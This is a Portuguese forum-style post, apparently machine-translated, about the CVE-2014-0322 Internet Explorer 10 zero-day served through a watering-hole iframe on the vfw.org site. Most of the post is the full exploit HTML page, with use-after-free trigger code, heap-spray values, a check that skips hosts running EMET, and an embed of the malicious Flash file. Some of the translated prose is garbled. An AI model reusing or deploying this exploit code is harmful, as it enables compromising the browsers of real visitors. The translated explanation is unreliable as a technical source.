Os investigadores de segurança de FireEye descobriram uma façanha nova IE 10 0-dia (CVE-2014-0322) que está sendo usado em um ataque de Molhar Ataque de Buraco e ser servido da teia de lugar de Veterans norte-americano de Guerras Estrangeiras (vfw [. ]org), somando um iFrame.
O objetivo do ataque é centrado em IE 10 com Jogador de Flash de Adobe no qual o resto do ataque é coordenado. O fracasso de segurança busca um erro de uso liberação (usar-depois de-livre) isso dá para o atacante acesso direto para a memória em um endereço arbitrário, usando um arquivo corrupto de Flash de Adobe, podendo passar para a proteção Plano Espacial Randomization (ASLR) e Prevenção de Datas de Execução (DEP).
A façanha tem um * .html um * .swf (eu arquivo corrupto de Flash de Adobe) e um * .as3.
O html contém:
Código:
<html> <head id="headId"> <title>main page</title> <script> function dword2data(dword) { var d = Number(dword).toString(16); while (d.length < 8) d = '0' + d; return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); } function developonther(txt) { var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async = true; xmlDoc.loadXML(txt); if (xmlDoc.parseError.errorCode != 0) { var err; err = "Error Code: " + xmlDoc.parseError.errorCode + "\n"; err += "Error Reason: " + xmlDoc.parseError.reason; err += "Error Line: " + xmlDoc.parseError.line; if (err.indexOf("-2147023083") > 0) { return 1; } else { return 0; } } return 0; } var g_arr = []; var arrLen = 0x250; function fun() { var a = 0; for (a = 0; a < arrLen; ++a) { g_arr[a] = document.createElement('div') }; var b = dword2data(0xdeadc0de); var c = 0x1a1b2000; while (b.length < 0x360) { if (b.length == (0x94 / 2)) { b += dword2data(c + 0x10 - 0x0c) } else if ( b.length == (0x98 / 2)) { b += dword2data(c + 0x14 - 0x8) } else if (b.length == (0xac / 2)) { b += dword2data(c - 0x10) } else if (b.length == (0x15c / 2)) { b += dword2data(0x42424242) } else { b += dword2data(0x1a1b2000 - 0x10) } }; var d = b.substring(0, (0x340 - 2) / 2); try { this.outerHTML = this.outerHTML } catch (e) {} CollectGarbage(); for (a = 0; a < arrLen; ++a) { g_arr[a].title = d.substring(0, d.length); } } function puIHa3() { var bamboo_go = "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'res://C:\\windows\\AppPatch\\EMET.DLL'>"; if (navigator.userAgent.indexOf("MSIE 10.0") > 0) { if (developonther(bamboo_go)) { return; } var a = document.getElementsByTagName("script"); var b = a[0]; b.onpropertychange = fun; var c = document.createElement('SELECT'); c = b.appendChild(c); } else if (navigator.userAgent.indexOf("IE10") > 0) { if (developonther(bamboo_go)) { return; } var a = document.getElementsByTagName("script"); var b = a[0]; b.onpropertychange = fun; var c = document.createElement('SELECT'); c = b.appendChild(c); } } </script> <embed src=Tope.swf width=10 height=10></embed> </head> </html>
Escrito por: Salu2 e Zion3R
até a próxima galera.
Att: rylook